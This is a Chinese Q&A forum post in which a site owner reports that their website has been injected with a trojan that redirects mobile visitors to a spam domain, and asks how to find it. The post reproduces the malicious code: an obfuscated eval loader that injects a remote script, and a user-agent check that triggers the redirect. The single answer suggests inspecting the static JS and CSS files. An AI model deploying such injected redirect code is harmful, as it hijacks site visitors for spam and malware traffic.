┏ (^ω^)=☞� 2019-12-24 23:10 采纳率: 100%
浏览 623
已采纳

网站被挂木马,手机访问会跳转到垃圾站

图片说明图片说明

图片说明

http://prophecy.ml

网站用电脑访问不会被重定向,用手机就会跳转到
https://m.qiche-hangjia.com:168/ua80666/

而手机切换为电脑标识后也不会被重定向
在微步在线云沙箱中查到https://www.kilin.xyz/1.js

代码:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('4.5(\'<6 1="3/2" 7="//0.b.c.d/8.0"><\\/9\'+\'a>\');',14,14,'js|type|javascript|text|document|write|script|src|20546349|scr|ipt|users|51|la'.split('|'),0,{}));


var LOUMtBZeW=navigator["userAgent"]["toLowerCase"]()["match"](/(ipod|iphone|ipad|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null;if(LOUMtBZeW){setTimeout('window.location.href="https://m.qiche-hangjia.com:168/ua80666/"',500)}

请问怎么才能找到木马位置?

  • 写回答

1条回答 默认 最新

  • BUG的缔造者 2019-12-26 14:48
    关注

    static下面,每个js和css都检查一遍

    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论

报告相同问题?

悬赏问题

  • ¥50 有数据,怎么建立模型求影响全要素生产率的因素
  • ¥50 有数据,怎么用matlab求全要素生产率
  • ¥15 TI的insta-spin例程
  • ¥15 完成下列问题完成下列问题
  • ¥15 C#算法问题, 不知道怎么处理这个数据的转换
  • ¥15 YoloV5 第三方库的版本对照问题
  • ¥15 请完成下列相关问题!
  • ¥15 drone 推送镜像时候 purge: true 推送完毕后没有删除对应的镜像,手动拷贝到服务器执行结果正确在样才能让指令自动执行成功删除对应镜像,如何解决?
  • ¥15 求daily translation(DT)偏差订正方法的代码
  • ¥15 js调用html页面需要隐藏某个按钮